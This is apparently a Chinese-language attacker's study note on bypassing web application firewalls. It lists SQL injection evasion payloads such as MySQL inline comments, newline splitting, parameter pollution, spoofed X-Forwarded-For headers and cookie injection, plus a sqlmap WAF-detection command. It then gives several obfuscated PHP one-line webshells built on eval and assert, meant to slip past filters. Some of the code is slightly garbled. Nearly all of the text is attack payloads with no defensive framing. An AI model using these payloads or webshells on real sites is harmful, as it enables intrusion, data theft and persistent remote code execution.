绕过waf

WAF:有硬件和软件类型。

常见的软WAF，常见：安全狗、云锁、云盾、护卫神。

SQL注入的绕过：

 WAF核心机制就是正则匹配。

通过正则匹配，如果符合规则，就拦截。

比如sql注入中and 1=1被拦截。

可尝试大小写绕过：And 1=1

编码绕过：  因为WAF 获取数据后不会解码。如&=>%26

通过不同进制绕过：例如16进制的0x32相当于十进制的2。

铭记：安全和用户体验都是需要平衡的，特别是针对WAF而言。

 

WAF判断的几种方法：

1.SQLmap

使用SQLmap中自带的WAF识别模块可以识别出WAF的种类，但是如果所安装的WAF没有明显特征，SQLmap就只能识别出类型是Generic

在SQLmap中输入一下命令：

sqlmap.py -u "http://xxx.com"  --identify-waf  --batch

一般情况下就可以被扫描出waf的种类。

2.手工判断

这个也比较简单，直接在相应网站的url上后面加上最基础的测试语句，比如union select 1,2,3%23,并且放在一个不存在的参数名中，若触发了WAF的防护，所以网站存在WAF.

 

内联注释：是MYSQL为了保持与其他数据兼容，将MYSQL中特有的语句放在/!…*/中，这些语句在不兼容的数据库中不执行，而在MYSQL自身却能识别、执行。

/*!50001*/表示数据库版本>=5.00.01中间的语句才能执行。

/**/在数据库里是注释的意思。而/*!*/是内联注释（核心在于注释里的也可执行，目的在于适应不同版本）。可对数据库版本的注释进行暴力破解，绕过狗。比如/*!10044select*/可绕过。

 

常见绕过手法：

大小写绕过（很老的WAF才有用）

替换绕过（很老的WAF才有用）比如将union select 1,2,3,4,5替换成ununionion selselectect 1,2,3,4,5

特殊字符绕过（%0a换行）例如传参?id=1 union /*!10044select*/ 1,2,3 %23/*%0afrom admin%23*/  换行之后被执行。

编码绕过（比如会多次解码的东西，例如我们DOM XSS绕狗那个）

等价替换（利用其它函数替代）【union #%0aselect 拦截】[inion all #%select 不拦截]

容器特性（例如Apace的Hpp,或者IIS的%分割）IIS的分割传参里面s%e%l%e%c%t相当于select。Apache特性参数污染：?id=1/*&id=2 union select 1,password,3 from admin limit 1,1#*/（参数污染是指当同一参数出现多次，不同的中间件会解析为不同的结果）

白名单（管理员权限或者是127.0.0.1本地访问不拦截(抓包修改XFF成本地IP)）

缓冲区（数据太多了，超出了WAF检测的范围）可在攻击语句中用注释填入大量无用字符，但要用POST传参。

有些函数加上反引号也是可以运行的。比如sleep(),updatexml()

生僻函数绕过（使用生僻函数替代常见的函数，例如在报错注入中使用polygon()函数代替常用的updatexml()函数

寻找网站源站IP（对于具有云waf防护的网站而言，只要找到网站的IP地址，然后通过IP访问网站，就可以绕过云waf的检测）

注入参数到cookies中（默写程序员在代码中使用$_REQUEST获取函数，它会依次从GET/POST/COOKIE中获取参数，如果WAF只检测了GET/POST而木有检测cookie，可以将注入语句放入cookie中绕过）

 

webshell的绕过：

我们常见的PHP一句话木马就是：<?php eval($_REQUEST['a'])?>这个是密码是a的一句话木马。这个语句肯定是会被拦截的。

绕过拦截：1.<?php eval(end($_PEQUEST));?>

end(): 输出数组中的当前元素和最后一个元素的值.($_所获取到的东西都是数组)

2.通过常量定义：<?php define("a","$_REQUEST[a]");eval(a);?>

3.通过字符串定义：

<?php

$a='ass';

$b='ert';

$funcName=$a.$b;

$x='funcName';

$$x($_REQUEST[1]);

?>

4.通过函数定义强行分割:

<?php

function a($a){

return $a;}

eval(a($_REQUEST)[1]);

?>

5.通过类定义，然后传参强行执行分割

<?php

class User

{

public $name='  ';

function_destruct(){

eval("$this->name");

}

}

$user=new User;

$user->name=".$_POST['dd'];

?>